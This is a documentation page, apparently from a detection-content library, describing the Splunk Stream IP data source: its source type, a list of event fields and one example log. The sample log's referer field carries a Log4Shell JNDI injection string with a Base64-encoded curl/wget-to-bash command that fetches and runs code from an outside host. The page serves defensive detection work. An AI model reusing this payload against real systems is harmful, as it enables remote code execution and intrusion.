Data Source: Splunk Stream IP

Description

Data source object for Splunk Stream IP

Details

| Property | Value |
| --- | --- |
| Source | stream:ip |
| Sourcetype | stream:ip |

Supported Apps

Event Fields

+ Fields
  <span class="pill kill-chain">_time</span>
  
  <span class="pill kill-chain">action</span>
  
  <span class="pill kill-chain">app</span>
  
  <span class="pill kill-chain">bytes</span>
  
  <span class="pill kill-chain">bytes_in</span>
  
  <span class="pill kill-chain">bytes_out</span>
  
  <span class="pill kill-chain">category</span>
  
  <span class="pill kill-chain">date_hour</span>
  
  <span class="pill kill-chain">date_mday</span>
  
  <span class="pill kill-chain">date_minute</span>
  
  <span class="pill kill-chain">date_month</span>
  
  <span class="pill kill-chain">date_second</span>
  
  <span class="pill kill-chain">date_wday</span>
  
  <span class="pill kill-chain">date_year</span>
  
  <span class="pill kill-chain">date_zone</span>
  
  <span class="pill kill-chain">dest</span>
  
  <span class="pill kill-chain">dest_ip</span>
  
  <span class="pill kill-chain">dest_port</span>
  
  <span class="pill kill-chain">eventtype</span>
  
  <span class="pill kill-chain">host</span>
  
  <span class="pill kill-chain">http_content_type</span>
  
  <span class="pill kill-chain">http_method</span>
  
  <span class="pill kill-chain">http_referer</span>
  
  <span class="pill kill-chain">http_referrer</span>
  
  <span class="pill kill-chain">http_user_agent</span>
  
  <span class="pill kill-chain">http_user_agent_length</span>
  
  <span class="pill kill-chain">http_x_forwarded_for</span>
  
  <span class="pill kill-chain">http_x_header</span>
  
  <span class="pill kill-chain">https</span>
  
  <span class="pill kill-chain">index</span>
  
  <span class="pill kill-chain">linecount</span>
  
  <span class="pill kill-chain">nginx_version</span>
  
  <span class="pill kill-chain">product</span>
  
  <span class="pill kill-chain">protocol</span>
  
  <span class="pill kill-chain">punct</span>
  
  <span class="pill kill-chain">request_time</span>
  
  <span class="pill kill-chain">response_time</span>
  
  <span class="pill kill-chain">server</span>
  
  <span class="pill kill-chain">site</span>
  
  <span class="pill kill-chain">source</span>
  
  <span class="pill kill-chain">sourcetype</span>
  
  <span class="pill kill-chain">splunk_server</span>
  
  <span class="pill kill-chain">src</span>
  
  <span class="pill kill-chain">src_ip</span>
  
  <span class="pill kill-chain">status</span>
  
  <span class="pill kill-chain">status_description</span>
  
  <span class="pill kill-chain">status_type</span>
  
  <span class="pill kill-chain">tag</span>
  
  <span class="pill kill-chain">tag::eventtype</span>
  
  <span class="pill kill-chain">time_local</span>
  
  <span class="pill kill-chain">timeendpos</span>
  
  <span class="pill kill-chain">timestartpos</span>
  
  <span class="pill kill-chain">uri_path</span>
  
  <span class="pill kill-chain">url</span>
  
  <span class="pill kill-chain">url_domain</span>
  
  <span class="pill kill-chain">url_length</span>
  
  <span class="pill kill-chain">vendor</span>
  
  <span class="pill kill-chain">vendor_product</span>
  
  <span class="pill kill-chain">version</span>
  
  <span class="pill kill-chain">web_server</span>
  

Example Log

site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1" src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000" protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]" http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-" uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004" category="application/json" https=""

Source: GitHub | Version: 1